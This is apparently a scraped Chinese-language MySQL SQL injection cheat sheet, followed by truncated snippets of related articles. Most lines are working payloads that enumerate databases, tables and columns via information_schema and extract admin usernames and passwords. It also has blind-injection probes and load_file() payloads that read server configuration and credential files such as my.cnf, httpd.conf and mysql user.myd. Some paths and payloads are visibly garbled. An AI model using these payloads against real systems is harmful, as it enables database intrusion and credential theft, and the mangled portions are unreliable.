union select 1,1,1,****1,1
order by 13
union select 1,2,3,4,****11,12,13 from admin
union select 1,version(),3,*** 13 from admin
union select 1,username,3,*** 13 from admin
union select 1,username,3,*** 13 from admin where id=2
and ord(mid(user(),1,1))=144
and 1=1 union select 1,2,3,4,5…….n
and 1=2 union select 1,2,3,4,5…..n
version() database() user()
and 1=2 union all select @@global.version_compile_os from mysql.user
and ord(mid(user(),1,1))=114
and 1=2 union select 1,2,3,schema_name,5,6,7,8,9,10 from information_schema.schemata limit 0,1
and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables where table_schema=資料庫(十六進製制) limit 0(開始的記錄,0為第乙個開始記錄),1(顯示1條記錄)
and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10 from information_schema.columns where table_name=表名(十六進製制)limit 0,1
and 1=2 union select 1,2,3,使用者名稱段,5,6,7,密碼段,8,9 from 表名 limit 0,1
union select 1,2,3concat(使用者名稱段,0x3c,密碼段),5,6,7,8,9 from 表名 limit 0,1
load_file(char(47))
/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf
c:\program files\apache group\apache\conf \httpd.conf 或c:\apache\conf \httpd.conf
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/etc/sysconfig/iptables
/etc/my.cnf
/etc/redhat-release
c:\mysql\data\mysql\user.myd
/etc/sysconfig/network-scripts/ifcfg-eth0
c:\program files\rhinosoft.com\serv-u\servudaemon.ini
c:\windows\my.ini
c:\boot.ini
**常用配置檔案 config.inc.php、config.php。load_file()時要用replace(load_file(hex),char(60),char(32))
注:char(60)表示 <,char(32)表示 空格
mysql 報錯注入語句 mysql注入
sql的注入型別有以下5種 boolean based blind sql injection 布林型注入 error based sql injection 報錯型注入 union query sql injection 可聯合查詢注入 stacked queries sql injection ...
mysql 注入語句
檢視mysql中所有的使用者及許可權 只有root許可權才能看 union select 1,2,3 失敗 union select 1,2,3,4 成功 檢視該使用者的所有資料庫 union select group concat schema name 2,3,4 from informatio...
MYSQL注入語句實用精解
mysql注入語句實用精解 只講字元型。order by xx union select 1 union select 1,concat user 0x3a,database 0x3a,version 這兩句是等價的。1 union select 1,concat ws char 58 user d...